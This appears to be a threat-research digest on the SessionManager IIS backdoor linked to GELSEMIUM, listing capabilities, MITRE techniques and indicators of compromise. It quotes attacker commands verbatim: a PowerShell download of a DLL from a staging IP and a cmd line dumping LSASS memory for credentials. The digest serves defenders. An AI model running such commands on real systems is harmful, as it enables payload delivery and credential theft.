Threat Research

The SessionManager IIS backdoor: a possibly overlooked GELSEMIUM artefact

Securonix

SessionManager is an IIS backdoor tied to the GELSEMIUM activity cluster that persists on compromised servers by loading a malicious IIS module after ProxyLogon-type exploits. It enables reading/writing files, remote command execution, and HTTP-based command-and-control, with multiple version updates and a wide victim footprint across NGOs, government, military, and industry clients. #GELSEMIUM #SessionManager #OwlProxy

Keypoints

  • SessionManager is a malicious native-code IIS module designed to be loaded by IIS applications to process legitimate HTTP requests while executing backdoor instructions.
  • It employs HTTP cookies for command and control, passing commands via cookies and returning results in HTTP responses.
  • Capabilities include reading/writing/deleting files, executing arbitrary binaries, and establishing connections to arbitrary network endpoints.
  • Multiple variants (V0–V3) show ongoing development with dated PDB paths, suggesting sustained maintenance since 2021.
  • Over 20 organizations and 34 servers across many regions were affected, with victims spanning NGOs, governments, military, and industry.
  • Post-deployment activity includes downloading tools (Dll2.dll, ssp.exe) via PowerShell, using Mimikatz-related tools, Avast memory-dump tools, and Python/PyInstaller-based loaders to evade detection.
  • Attribution suggests GELSEMIUM involvement, with overlaps to OwlProxy samples and shared tooling observed on multiple campaigns.

MITRE Techniques

  • [T1071.001] Web Protocols – The backdoor uses HTTP cookies to receive commands and inserts results into HTTP responses. “Commands are passed from an operator to SessionManager using a specific HTTP cookie name. The answer from the backdoor to an operator will usually be inserted in the body of the server HTTP response.”
  • [T1059.001] PowerShell – Used to fetch payloads from a remote server (e.g., Dll2.dll, ssp.exe) via PowerShell commands. “powershell “(New-Object Net.WebClient).DownloadFile(‘hxxp://202.182.123[.]185/Dll2.dll’,’C:WindowsTempwin32.dll’)””
  • [T1105] Ingress Tool Transfer – Downloading additional tools/payloads from a remote server as part of access expansion. “DownloadFile(‘…/Dll2.dll’)” and related artifacts from 202.182.123[.]185
  • [T1059.003] Windows Command Shell – Execution of commands via cmd.exe, including remote execution attempts. “C:WindowsTempvmmsi.exe cmd.exe(-)/c(-)”winchecksec.exe -accepteula -ma lsass.exe seclog.dmp””
  • [T1003.001] OS Credential Dumping – Post-deployment usage of Mimikatz-related tools to extract credentials and LSASS memory. “Mimikatz SSP and Avast memory dump tools” and attempts to read LSASS memory.
  • [T1027] Obfuscated/Compressed Files and Information – Operators used PyInstaller-packed Python scripts to obfuscate command execution. “custom PyInstaller-packed Python scripts to obfuscate command execution attempts.”
  • [T1543.003] Create or Modify System Process: Windows Service – Operators launched launcher scripts through the Windows services manager command line. “launcher scripts through the Windows services manager command line.”
  • [T1041] Exfiltration Over C2 Channel – Command results are returned within HTTP responses, signaling data exfiltration over the C2 channel. “The results of executed commands are returned as body data within HTTP responses.”

Indicators of Compromise

  • [IP] -IP addresses – 202.182.123[.]185 (Staging server, used between March and April 2021 at least), 207.148.109[.]111 (Unidentified infrastructure)
  • [MD5] SessionManager variants – 5FFC31841EB3B77F41F0ACE61BECD8FD, 84B20E95D52F38BB4F6C998719660C35, and other 2 items (4EE3FB2ABA3B82171E6409E253BDDDB5, 2410D0D7C20597D9B65F237F9C4CE6C9)
  • [MD5] Mimikatz runners – 95EBBF04CEFB39DB5A08DC288ADD2BBC, F189D8EFA0A8E2BEE1AA1A6CA18F6C2B
  • [MD5] PyInstaller-packed process creation wrapper – 65DE95969ADBEDB589E8DAFE903C5381
  • [MD5] OwlProxy variant samples – 235804E3577EA3FE13CE1A7795AD5BF9, 30CDA3DFF9123AD3B3885B4EA9AC11A8
  • [File path] SessionManager-related DLL/EXE paths – C:WindowsTempwin32.dll, C:WindowsTempwin32.exe, and other listed paths
  • [PDB Path] SessionManager-related PDBs – C:UsersGodLikeDesktoptt4SessionManagerModulex64Releasesessionmanagermodule.pdb, C:UsersGodLikeDesktoptt4SessionManagerV3Modulex64Releasesessionmanagermodule.pdb

Read more: https://securelist.com/the-sessionmanager-iis-backdoor/106868/